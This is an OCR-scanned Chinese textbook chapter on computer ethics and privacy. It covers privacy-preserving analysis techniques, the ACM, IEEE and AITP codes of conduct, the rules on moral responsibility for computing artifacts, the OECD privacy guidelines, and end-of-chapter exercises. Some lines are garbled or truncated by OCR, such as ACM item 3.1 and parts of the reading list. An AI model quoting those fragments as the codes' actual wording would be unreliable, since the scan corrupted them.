但 为 了 有 效 地 使 用 仍然 允许 使 用 数据 分 析 功 能 。 这 种 数据 分 析 功 能 的 一 个 例子 ， 是 检 
WU iF RK 
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e 匿名 (anonymization) : 这 个 功能 是 从 查询 结果 中 删除 具体 的 身份 识别 信息 ， 例 如 姓氏 
和 电话 号 码 ， 但 是 通过 对 匿名 的 唯一 标识 进行 排序 ， 分 析 人 员 能 够 检测 到 查询 之 间 的 
联系 。 
选择 性 披露 ( selective revelation): 这 是 一 种 在 允许 对 潜在 的 关联 数据 进行 连续 分 析 的 
同时 , 减少 个 人 信息 暴露 的 方法 。 该 功能 最 初 仅 以 清洁 的 方式 向 分 析 者 显示 信息 ， 也 
就 是 说 ， 使 用 不 能 透露 (直接 或 间接 ) 任何 人 的 私人 信息 的 统计 和 分 类 方法 。 如 果 分 
析 者 需要 进行 关注 时 ， 那 么 他 / 她 会 进一步 争取 获得 许可 ， 以 继续 获取 更 准确 的 信息 。 
如 果 在 适当 的 法 律 和 政策 指导 下 ， 最 初 的 信息 提供 了 足够 的 原因 人 允许 揭示 更 多 的 信息 ， 
将 授予 这 个 权限 。 
e 非 可 变 审计 (immutable audit): 一 种 防 算 改 的 方法 ,识别 数据 的 去 向 并 记录 谁 曾经 见 到 
过 这 些 数据 。 审 计 功 能 会 自动 地 永久 记录 所 有 数据 访问 ， 它 具有 强大 的 保护 功能 ， 避 
免 对 数据 进行 删除 、 修 改 和 非 授 权 的 使 用 。 
e 联想 记忆 (associative memory): 这 是 一 个 软件 模块 ， 它 能 够 识别 模式 并 且 建 立 那些 人 
类 用 户 可 能 错过 或 者 不 知道 其 存在 的 零散 数据 之 间 的 联系 。 用 这 种 方法 能 够 迅速 发 现 
存在 于 大 量 数据 中 被 发 现 的 数据 点 之 间 的 关系 。 
数据 库 拥 有 者 安装 一 个 专门 针对 数据 库 内 容 和 结构 及 外 部 机 构 特定 用 途 的 保密 设备 。 一 个 
独立 运行 的 保密 设备 能 够 与 来 自 多 个 机 构 的 多 个 数据 库 进行 互动 ， 为 执法 系统 、 情 报 用 户 或 其 


他 合适 的 用 户 收 集 和 关联 数据 以 满足 其 最 终 用 途 。 


19.4 ”道德 问题 


由 于 信息 系统 在 所 有 类 型 的 机 构 中 越 来 越 普 遍 和 重要 ， 存 在 许多 对 信息 和 电子 通信 设备 潜 
在 的 误 用 和 混用 ， 这 就 造成 了 隐私 和 安全 问题 。 除 了 合法 性 问题 外 ， 误 用 和 滥用 也 引起 人 们 对 
道德 问题 的 关注 。 道 德 指 的 是 一 个 道德 准则 体系 ， 关 系 到 特定 行为 是 有 益 还 是 有 害 ， 也 关系 到 
行为 的 动机 是 正确 还 是 错误 ， 以 及 行为 的 结果 。 本 节 ， 我 们 来 分 析 一 下 与 计算 机 和 信息 系统 安 
全 相关 的 道德 问题 。 


19.4.1 道德 和 1S 行业 


从 某 种 程度 上 说 ， 针 对 是 什么 构成 了 那些 使 用 信息 系统 或 者 访问 信息 系统 的 人 的 道德 行 
为 ， 所 进行 的 特征 描述 并 不 是 唯一 的 。 基 本 的 道德 规范 因 社 会 文明 程度 的 提高 而 得 到 了 发 展 。 
但 是 ， 围 绕 计算 机 和 信息 系统 存在 着 一 些 独特 的 需要 考虑 的 问题 。 首 先 ， 计 算 机 技术 使 以 前 不 
可 能 的 很 多 活动 成 为 可 能 。 这 包括 较 大 规模 的 记录 保存 ， 特 别 是 关于 个 人 的 记录 ， 已 经 具有 了 
更 细 粒 度 的 个 人 信息 收集 能 力 及 更 加 精确 的 数据 挖掘 和 数据 匹配 能 力 。Internet 带 来 的 通信 规 
模 和 互联 规模 的 扩大 加 大 了 某 些 个 人 进行 危害 活动 的 能 力 。 其 次 ,计算 机 技术 包含 了 新 实体 类 
型 的 诞生 ， 这 些 新 实体 与 以 前 形成 的 道德 规范 相 冲 突 ， 例 如 数据 库 、 网 页 浏览 器 、 聊 天 室 和 
cookie， 等 等 。 

更 进一步 ， 事 实 上 ， 那 些 具有 专业 知识 和 专业 技能 的 人 对 于 全 人 类 有 着 高 于 常人 的 道德 义 
务 。 我 们 可 以 用 一 个 基于 [GOTT] 中 讨论 的 道德 等 级 ( 见 图 19-5) 模型 来 说 明 这 一 点 。 位 
于 等 级 顶层 的 是 专业 人 员 与 全 人 类 共有 的 道德 价值 观 ， 如 诚信 、 公 平和 正义 。 作 为 一 个 经 过 专 
业 培 训 的 人 员 ， 还 有 额外 与 其 工作 相关 的 道德 义务 。 适 用 于 所 有 专业 人 员 的 一 般 的 原则 是 在 这 
个 等 级 出 现 的 。 最 后 ， 每 个 职业 都 有 其 特定 的 道德 价值 和 义务 ， 这 些 道德 价值 和 义务 与 专业 人 
员 的 知识 及 其 对 他 人 的 影响 力 有 关 。 大 多 数 的 职业 都 在 职业 行为 规范 中 体现 出 了 全 部 的 道德 等 
级 。 这 是 我 们 接 下 去 要 讨论 的 主题 。 
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19.4.2 与 计算 机 和 信息 系统 有 关 的 道德 问题 


我 们 现在 看 看 计算 机 技术 中 出 现 的 道德 问题 。 计 算 机 已 经 成 为 个 人 信息 和 可 动 资 产 的 主要 
储存 库 ， 如 银行 记录 、 证 券 记录 和 其 他 金 
融 信息 。 其 他 类 型 的 数据 库 ， 包 括 统计 性 
的 和 非 统计 性 的 ， 都 是 具有 相当 大 价值 的 
资产 。 这 些 资产 只 能 通过 技术 和 自动 化 方 
法 浏览 、 创 建 和 更 改 。 那 些 能 够 懂得 和 利 
用 技术 的 人 ， 再 加 上 那些 获得 访问 权限 的 
人 ， 拥 有 与 那些 资产 有 关 的 权力 。 
一 篇 关于 计算 机 和 道德 的 经 典 论文 
[ PARK88 ] 指出 ， 道 德 问题 是 由 计算 机 所 
担当 的 角色 产生 的 结果 所 引起 的 ， 这 些 角 
色 包 括 : 
© 信息 储存 库 和 处 理 器 (repository and 
processor of information) : 未 经 授权 
使 用 那些 不 使 用 将 会 闲置 的 计算 机 
服务 或 者 计算 机 中 存储 的 信息 ， 引 
起 合适 性 或 者 公正 性 问题 。 19-5 ”道德 层次 结构 

© 新 形式 和 类 型 资产 的 制造 者 (producer 
of new form and type of asset): 例如 ， 计 算 机 程序 完全 是 一 种 新 型 资产 ， 可 能 与 其 他 资产 的 
所 有 权 概 念 有 所 不 同 。 

o 行为 工具 (instruments of act) : 计算 机 服务 以 及 计算 机 、 数 据 和 程序 的 用 户 ， 必 须 在 多 
大 程度 上 对 计算 机 输出 的 完整 性 和 合适 性 负责 ? 

© 威胁 和 欺骗 的 标志 (symbol of intimidation and deception): 把 计算 机 想象 成 会 思考 的 机 
器 、 绝 对 真理 的 制造 者 、 绝 对 可 靠 的 、 容 易 受 到 指责 的 ， 以 及 犯错 者 的 神奇 替代 者 的 
做 法 ， 值 得 我 们 深思 。 

我 们 主要 关注 职业 责任 与 道德 或 伦理 责任 的 平衡 问题 。 这 里 我 们 引用 计算 机 或 者 IS 专业 
人 员 面 临 的 各 种 类 型 的 道德 问题 中 的 两 个 领域 。 第 一 个 是 ，IS 专业 人 员 可 能 发 现 他 们 自己 处 于 
这 样 的 境地 : 即 职业 道德 上 的 责任 与 其 对 老板 的 忠诚 相 冲 突 。 这 种 冲突 会 给 员工 带 来 激烈 的 思 
想 斗 争 ， 要 人 么 鼓 起 勇气 去 告发 ， 要 么 置身 于 一 个 可 能 有 损 公 众 或 者 公司 客户 利益 的 处 境 中 。 例 
如 ， 软 件 开发 者 可 能 知道 一 个 产品 在 未 经 过 充分 检测 的 情况 下 就 按 计 划 进 行 发 布 ， 以 满足 老板 
指定 的 交 货 期 。 是 否 告 发 此 事 是 作为 一 个 IS 专业 人 员 最 困难 的 抉择 之 一 。 机 构 有 义务 为 员工 
提供 可 供 选 择 的 、 不 太极 端的 机 会 ， 如 一 个 内 部 的 监督 专员 再 加 上 一 个 不 处 罚 暴露 内 部 问题 的 员 
工 的 承诺 。 另 外 ， 专 业 学 会 应 该 提供 一 种 机 制 ， 这 种 机 制 让 其 成 员 可 以 得 到 关于 如 何 举报 的 建议 。 

另 一 个 道德 问题 的 例子 涉及 可 能 的 利益 冲突 。 例 如 ， 如 果 某 顾问 在 某 供应 商 处 拥有 财务 利 
益 ， 那 么 当 这 个 顾问 向 任何 客户 推荐 该 供应 商 的 产品 和 服务 时 ， 此 利益 关系 应 该 被 公开 。 


19.4.3 ”行为 规范 


与 科学 和 工程 学 领域 不 同 的 是 ， 道 德 不 能 被 简化 为 精确 的 法 律 条 款 或 者 具体 的 法 案 。 尽 
管 一 个 行业 的 雇主 或 者 客户 可 以 期 待 该 行业 有 一 个 内 部 道德 准则 ， 但 是 许多 行业 领域 在 这 个 方 
面 可 能 表现 得 较为 模糊 。 为 了 给 专业 人 员 提 供 专业 指导 和 阐明 雇主 和 顾客 所 期 待 的 权利 是 怎样 
的 ， 许 多 行业 协会 已 经 采纳 了 一 些 行为 道德 规范 。 
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职业 行为 规范 能 够 提供 下 列 功能 [ GOTT99 ]: 

1. 该 规范 能 够 提供 两 种 启发 功能 : 一 个 是 为 部 分 行业 的 道德 行为 提供 积极 的 刺激 作用 ， 另 
一 个 是 增加 消费 者 或 者 用 户 对 于 IS 产品 或 者 服务 的 信心 。 然 而 ， 停 留 在 仅仅 提供 启发 性 语言 
的 规范 在 说 明 的 丰富 程度 上 可 能 是 模糊 和 开放 的 。 

2. 规范 可 以 是 教育 性 的 。 它 告知 专业 人 员 ， 为 了 保证 特定 水 平 的 工作 质量 ， 他 们 需要 做 出 
哪些 承诺 ; 为 了 其 产品 用 户 和 公众 的 利益 ， 他 们 需要 承担 哪些 责任 ， 以 及 产品 可 能 会 影响 非 使 
用 者 的 范围 。 该 规范 也 可 以 用 于 教育 管理 者 ， 主 要 是 关于 管理 者 鼓励 和 支持 员工 讲 道德 的 义务 
及 管理 者 自身 的 道德 义务 。 

3. 规范 能 够 在 专业 人 员 做 出 的 遵守 道德 的 决策 可 能 与 管理 者 或 者 顾客 形成 冲突 的 情况 下 为 
其 提供 支持 。 

4. 规范 可 以 是 一 种 威慑 和 训练 的 手段 。 行 业 协 会 能 够 将 规范 作为 取消 成 员 资 格 甚至 撤销 行 
业 许 可 证 的 依据 。 员 工 能 够 用 规范 作为 行为 处 罚 的 依据 。 

5. 如 果 规 范 受到 广泛 重视 ， 那 么 它 就 能 够 提升 行业 的 公众 形象 。 

我 们 用 三 个 具体 例子 来 解释 计算 机 专业 人 员 的 职业 道德 规范 的 概念 。ACM (美国 计算 机 
协会 ) 道德 规范 和 行业 操守 ( 见 图 19-6 )， 适用 于 计算 机 科学 家 S。IEEE (电气 和 电子 工程 师 协 
会 ) 的 道德 规范 ( 见 图 19-7 )， 适 用 于 计算 机 工程 师 和 其 他 种 类 的 电子 和 电子 工程 师 。AITP( 信 
息 技术 专业 协会 ， 从 前 的 数据 处 理 管理 协会 ) 的 行为 规范 〈 见 图 19-8 )， 适 用 于 计算 机 系统 和 

工程 的 管理 者 。 
1. 通常 的 道德 规则 
1.1 为 社会 和 人 类 做 贡献 
1.2 不 伤害 他 人 
1.3 诚实 守信 
1.4 公正 ， 不 歧视 他 人 
1.5 尊重 产权 ,包括 版 权 和 专利 
1.6 正确 评价 知识 产权 
1.7 尊重 他 人 隐私 


1.8 保守 机 密 
2. 更 详细 的 职业 责任 


2.1 在 职业 工作 的 过 程 和 产品 中 ， 努 力 实现 最 高 质量 、 效 率 和 尊严 

2.2 取得 并 保持 行业 的 竞争 力 

2.3 了 解 并 遵守 与 职业 工作 相关 的 现行 法 律 

2.4 接受 并 提供 适当 的 专业 评论 

2.5 全 面 深入 地 评估 计算 机 系统 及 其 所 造成 的 影响 ， 包 括 分 析 可 能 存在 的 风险 


2.6 遵守 合同 、 协 议 ， Se aie 
2.7 提升 公众 对 计算 处 理 及 其 结果 的 
2.8 只 有 在 授权 的 情况 下 ， A 
领导 规 
3.1 OTL INA STEERER AIRES 
3.2 对 人 员 和 资源 进行 管理 ， 以 便 设 计 和 创建 可 以 提升 工作 期 间 的 工作 质量 的 信息 系统 
3.3 承认 并 支持 对 机 构 的 计算 资源 和 通信 资源 的 适当 使 用 和 授权 使 用 
poia 确保 用 户 和 那些 将 受 系统 影响 的 人 能 够 明确 阑 述 他 们 的 需要 ， 其 后 必须 证 实 系统 是 否 
足 了 这 些 
3.5 阑 明和 支持 保护 用 户 和 其 他 受 计算 机 系统 影响 者 尊严 的 政策 
3.6 为 机 构成 员 学 习 计算 机 系统 的 原则 和 局 限 性 创造 机 会 


4. 遵守 规范 
4.1 维护 和 促进 该 规范 的 各 项 原则 
4.2 违反 本 规范 被 视 为 自动 放弃 ACM 的 成 员 资 格 


图 19-6 ACM 道德 和 职业 行为 规范 
(Copyright © 1997, Association for Computing Machinery, Inc.) 





© 图 19-6 是 一 个 ACM 规范 的 精简 版 。 
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作为 IEEE 的 成 员 ， 我 们 已 经 认识 到 我 们 的 技术 在 影响 世界 生活 质量 方面 的 重要 性 ， 并 且 愿 意 对 我 们 的 职业 、 
学 会 成 员 和 所 在 团体 承担 个 人 义务 。 以 最 高 的 道德 和 职业 操守 做 此 承诺 ， 并 同意 : 
1. 以 公众 安全 、 健 康 和 福利 作为 工程 决策 的 根本 出 发 点 ， 并 及 时 公布 可 能 危及 公众 或 者 环境 的 要 素 ; 
2. 在 任何 情况 下 都 要 避免 那些 真实 存在 的 或 者 可 察觉 的 利益 冲突 ， 并 且 当 它们 确实 出 现时 要 及 时 告知 受害 方 ; 
3. 在 发 表 声明 或 者 基于 现 有 数据 进行 评估 时 ， 要 诚信 务实 ; 
4. 拒绝 各 种 形式 的 贿赂 ; 
5. 提高 对 于 技术 本 身 、 技 术 的 适当 的 应 用 及 其 潜在 的 后 果 的 理解 ; 


6. 保持 并 提升 自己 技术 的 竞争 力 ， 只 有 在 经 过 培训 和 实践 并 取得 资格 时 ， 或 者 在 相关 的 限制 完全 公开 时 ， 才 为 他 
人 承担 科技 性 任务 ; 

人 

8. 不 管 种族 、 宗 教 、 性 别 、 残 疾 、 年 龄 或 者 国籍 等 因素 ， 公 平 对 待 所 有 人 

9. 不 以 恶意 的 行为 影响 他 人 身体 、 财 产 、 名 誉 或 者 工作 ; 

10. 在 工作 中 ， 关 注 同事 和 工友 的 职业 发 展 ， 并 支持 他 们 遵守 该 道德 规范 。 


图 19-7 IEEE 道德 规范 
(Copyright © 2006, Institute of Electrical and Electronics Engineers ) 





按照 我 们 的 管理 职责 ， 我 将 : 

保持 个 人 知识 与 时 俱 进 ， 并 且 确 保 在 需要 时 有 所 需 专业 技术 的 支持 。 
与 他 人 共享 我 的 知识 ， 并 且 尽 最 大 的 努力 为 管理 层 提供 真实 、 客 观 的 信息 。 
承担 我 工作 的 全 部 责任 。 
正确 行使 委托 给 我 的 权利 。 
不 误 传 或 者 保留 有关 设 备 、 软 件 或 者 系统 性 能 的 信息 。 
不 使 用 缺乏 知识 或 者 经 验 的 他 人 。 

按照 我 对 同事 和 职业 的 义务 ， 我 将 : 


在 我 所 有 的 职业 关系 中 保持 诚实 

对 于 引起 我 注意 的 任何 非法 或 者 不 道德 的 行为 采取 适当 的 行动 。 然而 ， 我 与 任何 人 的 争辩 仅 出 现在 我 有 理由 
相信 观点 的 真实 性 且 不 涉及 个 人 利益 时 。 

尽力 共享 我 的 专业 知识 。 

与 他 人 合作 来 理解 和 明确 问题 。 

未 经 过 明确 地 承认 和 授权 ， 不 得 使 用 或 者 参与 他 人 的 工作 。 

不 利用 缺乏 知识 或 者 无 经 验 的 他 人 为 自己 谋 利 。 





”图 19-8 AITP 行为 标准 
(Copyright © 2006, Association of Information Technology Professionals) 


这 些 规 范 里 出 现 的 许多 共同 主题 包括 : (1) 其 他 人 的 尊严 和 价值 ; (2 ) 人 的 正直 和 诚实 ; 
(3) 工作 责任 ; (4) 信息 的 机 密 性 ; (5 ) 公众 安全 、 健 康 和 福利 ; (6) 为 提高 行业 标准 而 参与 
行业 协会 ， 和 (7 ) 公共 知识 和 对 技术 的 使 用 权 是 与 社会 权利 等 价 的 这 一 观念 。 
这 三 个 规范 都 强调 行业 对 他 人 的 责任 ， 毕 竟 这 是 道德 的 中 心意 思 。 这 种 强调 人 而 不 是 机 
器 或 者 软件 的 做 法 是 很 好 的 。 然 而 ， 该 规范 很 少 详细 谈 到 技术 问题 ， 即 计算 机 和 信息 系统 。 这 
就 是 说 ， 这 种 方法 是 相当 普遍 的 ， 可 以 适用 于 大 多 数 行业 ， 不 能 充分 反映 与 计算 机 和 IS 技术 
的 发 展 和 使 用 相关 的 特有 的 道德 问题 。 例 如 ， 这 些 规范 没有 明确 地 处 理 表 19-3 或 者 前 面 章节 Pe 
[ PARK88 ] 中 提出 的 问题 。 631 


19.4.4 ”规则 


目前 人 们 在 共同 努力 起 草 一 份 简要 的 、 关 于 在 计算 机 系统 开发 时 如 何 遵 循 相关 道德 规 
范 的 指导 意见 。 这 份 指导 性 文献 是 尽责 计算 特别 委员 会 (Ad Hoc Committee on Responsible 
Computing) 的 重要 成 果 ， 目 前 仍 在 修订 当中 。 委 员 会 已 经 发 布 了 一 份 定期 更 新 的 文档 ， 标 题 
是 “计算 产品 的 道德 责任 ”(Moral Responsibility for Computing Artifacts)。 一 般 来 讲 ， 该 文档 就 
是 我 们 所 说 的 规则 。 目 前 该 规则 的 版 本 是 27， 它 反映 了 目前 委员 会 关于 这 个 项 目的 想法 和 付 
出 的 努力 。 
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术语 “计算 产品 ”(Computing Artifact) 指 的 是 包括 电脑 程序 在 内 的 任何 产品 。 它 包括 运行 
在 一 般 意 义 上 的 电脑 上 的 应 用 软件 ， 也 包括 那些 烧 录 在 硬件 上 的 ， 或 者 散人 到 机 械 设 备 、 机 器 
人 、 手 机 、 网 络 机 器 人 和 玩具 中 的 程序 ， 以 及 那些 在 不 止 一 台 机 器 上 分 布 运行 的 程序 。 该 规则 
也 适用 于 商业 软件 、 免 费 软件 、 开 源 软件 、 休 闲 软件 、 学 术 活动 或 研究 工具 类 软件 。 

目前 ， 该 规则 内 容 如 下 : 

1. 设计 、 开 发 、 部 署 某 计算 产品 的 人 员 ， 对 该 产品 本 身 及 其 可 预见 的 影响 负 有 道德 方面 的 
责任 。 设 计 、 开 发 、 部 署 或 有 意 使 用 该 产品 作为 社会 技术 系统 的 一 部 分 的 其 他 人 员 应 该 分 担 此 
责任 。 

2. 计算 产品 的 责任 分 担 并 非 零 和 博弈 (zero-sum game)。 个 人 应 承担 的 责任 并 不 会 因为 更 
多 的 人 参与 该 计算 产品 的 设计 、 开 发 、 部 署 和 使 用 而 简单 地 减 小 。 相 反 ， 个 人 的 责任 包括 对 产 
品 的 行为 负责 ， 对 产品 部 署 后 所 带 来 的 影响 负责 ， 以 及 对 该 影响 合理 预见 的 程度 负责 。 

3. 有 意 使 用 特定 计算 产品 的 人 员 ， 对 使 用 该 产品 负 有 道德 上 的 责任 。 

4. 如 果 有 人 有 意 设 计 、 开 发 、 部 署 或 使 用 某 计 算 产品 ， 仅 当 他 为 考虑 使 用 该 产品 的 社会 技 
术 场 景 付出 了 适当 努力 时 ， 他 才能 负责 任 地 去 设计 、 开 发 、 部 署 或 使 用 它 。 

5. 设计、 开发 、 部 署 、 促 销 或 评估 一 款 计算 产品 的 人 员 ， 在 产品 本 身 、 产 品 可 预见 的 影响 
和 产品 所 嵌入 的 社会 技术 系统 三 个 方面 不 应 该 显 式 或 隐 式 地 欺骗 产品 用 户 。 

与 先前 讨论 的 行为 规范 相 比 ， 这 份 规则 的 条 目 很 少 并 且 更 为 一 般 化 。 人 们 希望 各 种 各 样 的 
参与 计算 机 系统 设计 和 开发 的 人 员 能 使 用 该 规则 。 该 规则 作为 一 个 有 用 的 指导 方针 已 经 得 到 了 
广泛 的 认可 ,支持 者 包括 来 自 许多 国家 的 学 者 、 医 生 、 计 算 机 科学 家 和 哲学 家 [MILL11]。 这 
份 规则 很 可 能 会 通过 计算 机 相关 的 专业 机 构 影 响 道德 行为 规范 未 来 的 版 本 。 


19.5 ”推荐 读物 


下 面 是 一 些 关 于 计算 机 犯罪 和 网 络 犯 罪 有 用 的 论文 : [KSHE06]、[CYMR06] 和 [TAVA00]。 
[BRAU01] 对 版 权 、 专 利和 商标 提供 了 一 个 很 好 的 介绍 。[GIBB00] 对 于 数字 千年 版 权 法 给 出 了 
一 个 简要 的 描述 。[LIU03] 对 于 数字 版 权 管理 提供 了 一 个 非常 有 用 的 介绍 。[CAMP03] 讨论 了 
DRM 中 法 律 方面 的 问题 并 且 描 述 了 一 些 商 业 化 的 系统 。 

[ISAT02] 是 关于 安全 和 隐私 之 间 的 关系 的 启发 性 讨论 ， 它 对 保护 隐私 的 技术 安全 措施 提出 
THIN. [GOTT99] 详细 讨论 了 软件 工程 道德 规范 ， 以 及 规范 对 行业 里 的 个 人 意味 着 什么 等 问 
fA. [CHAP06] 对 与 信息 系统 创建 和 使 用 有 关 的 基础 道德 问题 进行 了 很 有 见解 的 讨论 [HARR90] 
详细 讨论 了 关于 如 何 培训 员工 将 道德 融 人 决策 制定 和 与 信息 系统 和 计算 机 使 用 相关 的 行为 之 
中 。[ANDE93] 仔细 分 析 了 ACM 道德 规范 的 实际 意义 ， 并 通过 一 些 案例 学 习 进 行 了 说 明 。 


ANDE93 Anderson, R.. et al. “Using the New ACM Code of Ethics in Decision 
Making.” Communications of the ACM, February 1993. 

BRAUO1 Braunfeld, R., and Wells, T. “Protecting Your Most Valuable Asset: 
Intellectual Property.” IT Pro, March/April 2001. 

CAMP03 Camp, L. “First Principles of Copyright for DRM Design.” /EEE Internet 
Computing, May/June 2003. 

CHAP06 Chapman, C. “Fundamental Ethics in Information Systems.” Proceedings of 
the 39th Hawaii International Conference on System Sciences, 2006. 

CYMR06 Team Cymru. “Cybercrime: An Epidemic.” ACM Queue, November 2006. 

GIBB00 Gibbs, J. “The Digital Millennium Copyright Act.” ACM Ubiquity, August 
2000. 

GOTT99 Gotterbarn, D. “How the New Software Engineering Code of Ethics Affects 
You.” IEEE Software, November/ December 1999. 
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HARR90 Harrington, S.. and McCollum, R. “Lessons from Corporate America 
Applied to Training in Computer Ethics.” Proceedings of the ACM 
Conference on Computers and the Quality of Life (SIGCAS and SIGCAPH), 
September 1990. 

ISAT02 Information Science and Technology Study Group. “Security with Privacy,” 
DARPA Briefing on Security and Privacy, Dec. 2002. www.cs.berkeley 
.edu/~tygar/ papers ISAT-final-briefing. pdf 

KSHE06 Kshetri, N. “The Simple Economics of Cybercrimes.” JEEE Security and 
Privacy, January/February 2006. 

LIU03 Liu, Q.: Safavi-Naini, R.; and Sheppard, N. “Digital Rights Management 
for Content Distribution.” Proceedings, Australasian Information Security 
Workshop 2003 (AISW2003), 2003. 

TAVA00 Tavani, H. “ Defining the Boundaries of Computer Crime: Piracy, Break- 
Ins, and Sabotage in Cyberspace.” Computers and Society, September 2000. 


19.6 ”关键 术语 、 复 习题 和 习题 


关键 术语 
code of conduce (行为 规范 ) ethics (道德 ) 
computer crime (计算 机 犯罪 ) infringement (侵权 ) 
consumer (消费 者 ) intellectual property (知识 产权 ) 
copyright (版权) patent (专利 ) 
cybercrime (网络 犯 罪 ) privacy (隐私 ) 
Digital Millennium Copyright Act (DMCA, 千年 数 rights holder (版 权 所 有 者 ) 
字 版 权 法 案 ) service provider (服务 提 供 者 ) 
digital rights management (数字 版 权 管 理 ) trademark (商标 ) 
复习 题 
19.1 根据 计算 机 在 犯罪 活动 中 所 起 的 作用 描述 计算 机 犯罪 的 分 类 。 
19.2 定义 三 种 类 型 的 财产 。 
19.3 ”定义 三 种 类 型 的 知识 产权 。 
19.4 在 声明 版 权时 ， 必 须 满足 哪些 基本 条 件 ? 
19.5 ”版 权 授予 了 所 有 人 哪些 权利 ? 
19.6 简要 描述 千年 数字 版 权 法 案 。 
19.7 什么 是 数字 版 权 管理 ? 
19.8 ”描述 数字 版 权 管理 系统 的 用 户 的 主要 类 别 。 
19.9 欧盟 指令 中 包含 的 数据 保护 的 关键 原则 是 什么 ? 


19.10 ”通用 准则 中 关注 的 有 关 隐私 的 问题 ， 与 正式 文档 、 标 准 和 机 构 策略 中 所 关注 的 问题 有 何不 同 ? 
19.11 职业 行为 规范 服务 于 什么 样 的 功能 实践 ? 


对 于 表 19-1 里 引用 的 每 一 类 网 络 犯罪 ， 指 出 它 是 否 属于 以 计算 机 为 目标 、 存 储 介质 或 者 作为 通信 
工具 的 类 别 。 在 第 一 种 情况 中 ， 指 明 犯 罪 主要 是 针对 数据 完整 性 、 系 统 完整 性 、 数 据 机 密 性 、 隐 
私 还 是 可 用 性 的 攻击 。 

根据 表 19-2 回答 习题 19.1 中 的 问题 。 

回顾 最 近 的 计算 机 犯罪 调查 结果 ， 例 如 CSVFBI 或 者 AusCERT 的 调查 结果 。 调 查 结果 报告 中 犯罪 
的 类 型 有 哪些 变化 ? 调查 的 结果 和 表 19-2 中 列 出 的 结果 之 间 有 什么 不 同 ? 
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19.4 早期 一 个 关于 DCMA 的 有 争议 的 使 用 发 生 在 美国 的 一 个 案例 中 。 该 案例 是 由 美国 电影 协会 


19.5 


19.6 


(MPAA) 在 2000 年 引起 的 ， 它 试图 对 DeCSS 程序 和 其 派生 的 程序 的 发 行进 行 压制 。 这 些 程序 
可 以 用 在 商业 DVD 上 以 躲避 版 权 保护 。 查 找 有 关 该 案件 的 简要 描述 和 结果 。 判 断 MPAA 压制 
DeCSS 解码 算法 的 细节 是 否 能 够 成 功 。 

考虑 一 个 像 苹果 公司 的 FairPlay 这 样 流行 的 DRM 系统 一 一 用 于 保护 从 iTunes 音乐 商店 购买 的 音频 
光碟 。 如 果 有 人 从 iTunes 商店 购买 了 一 张 由 EMI 这 样 的 唱片 公司 制作 的 某 音乐 家 的 光碟 。 请 确认 
哪个 公司 或 者 个 人 履行 了 图 19-2 中 显示 的 每 一 个 DRM 组 件 的 角色 。 

表 19-3 列 出 了 由 经 济 合作 与 发 展 机 构 (OECD) 发 布 的 保密 指南 。 将 这 些 指南 与 欧盟 采取 的 数据 保 
护 指令 作 以 比较 。 


表 19-3 ”经 济 合作 与 发 展 机 构 (OECD) 关于 隐私 保护 和 信息 跨国 传送 的 指导 纲领 

收集 限制 (Collection limitation) 

对 收集 个 人 数据 应 当 有 所 限制 并 且 任 何 这 样 的 数据 应 当 通过 合法 的 和 公正 的 手段 获取 ， 在 适当 情况 下 ， 须 
征 得 数据 主体 的 同意 。 
数据 质量 (Data quality) 

个 人 数据 应 当 与 使 用 它们 的 目的 有 关 ， 而 且 ， 在 该 目的 所 需 的 程度 上 ， 这 些 数据 应 该 是 准确 的 、 完 整 的 并 
且 是 保持 更 新 的 。 
目的 明确 (Purpose specification) 

在 个 人 数据 开始 收集 之 前 ， 应 该 明确 其 目的 ， 并 且 在 随后 的 使 用 中 仅 限 于 实现 这 些 目的 ， 或 者 其 他 的 与 这 
些 目的 不 相抵 触 的 目的 ， 以 及 每 次 目的 变更 时 所 指定 的 目的 。 
使 用 局 限 (Use limitation ) 

除非 数据 主题 或 者 法 律 权威 的 同意 ， 个 人 信息 不 应 该 被 泄露 ， 使 其 可 用 或 者 应 用 于 其 他 与 前 面 提 到 的 原则 
不 一 致 的 目的 。 
安全 保护 措施 (Security safeguards) 

个 人 信息 应 当 通 过 合理 的 安全 保护 措施 得 到 保护 ， 以 免 造 成 诸如 风险 类 的 损失 ， 或 者 受到 未 经 授权 的 访 
问 、 破 坏 、 使 用 、 修 改 或 者 泄露 。 
公开 (Openness ) 

应 该 有 公开 与 个 人 数据 相关 的 开发 、 实 践 和 政策 的 一 般 性 策略 。 与 建立 个 人 数据 属性 、 使 用 的 主要 目的 以 
及 数据 控制 器 的 识别 和 通常 的 位 置 有 关 的 工具 应 该 是 随时 可 用 的 。 
个 人 参与 (Individual participation) 

个 人 应 当 拥 有 以 下 权利 : 


a 有 权 从 数据 控制 器 获得 与 自身 有 关 的 数据 ， 否 则 的 话 ， 有 权 确 认 该 数据 控制 器 是 否 持 有 与 其 相关 的 
数据 。 


b 在 合理 的 时 间 内 ， 以 合理 的 方法 和 容易 理解 的 形式 ， 得 到 与 他 相关 的 信息 的 通知 ， 如 果 此 通知 需要 付 
费 ， 应 保证 费用 不 超过 适当 的 限度 。 
c. 如 果 以 上 (a) 和 (b) 提 到 的 要 求 被 拒绝 ， 拒 绝 方 必须 给 出 理由 ; 有 权 对 这 样 的 拒绝 提出 质疑 。 
d. 有 权 对 与 自己 有 关 的 信息 提出 质疑 ， 且 一 旦 质疑 成 功 ， 该 信息 必须 被 删除 、 订 正 、 补 完 或 者 修改 。 
责任 (Accountability) 


数据 控制 器 应 该 负责 遵守 对 以 上 提 到 的 原则 有 影响 的 措施 。 


19.7 许多 国家 现在 要 求 收集 个 人 信息 的 机 构 ， 发 布 它 们 有 关 如 何 详细 地 处 理 和 使 用 这 些 个 人 信息 的 保 


19.8 


密 策略 。 从 你 为 其 提供 详细 个 人 信息 的 机 构 中 获取 该 机 构 的 保密 策略 的 副本 。 将 这 个 保密 策略 与 


19.3 节 列 出 的 原则 进行 比较 。 该 策略 包含 了 全 部 这 些 原 则 吗 ? 


管理 简报 列 出 了 以 下 5 个 大 的 举措 来 提升 保密 性 。 将 这 些 建 议 与 附录 H. 4 中 的 良好 实践 信息 隐私 
权 标 准 作 比较 。 讨 论 其 中 的 不 同 。 


1. 随处 可 见 的 和 一 贯 的 管理 层 支 持 。 
2. 建立 隐私 权 的 责任 。 隐 私 权 要 求 必须 被 纳入 任何 处 理 个 人 可 识别 信息 (PIL) 的 职责 中 。 
3. 把 隐私 权 和 安全 纳 人 到 系统 和 应 用 程序 的 生命 周期 中 。 这 包括 正式 的 隐私 冲突 评估 。 
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4. 提供 持续 有 效 的 意识 和 培训 。 

5. 加 密 可 移动 的 个 人 可 识别 信息 (PII)。 这 包括 传输 和 移动 设备 。 

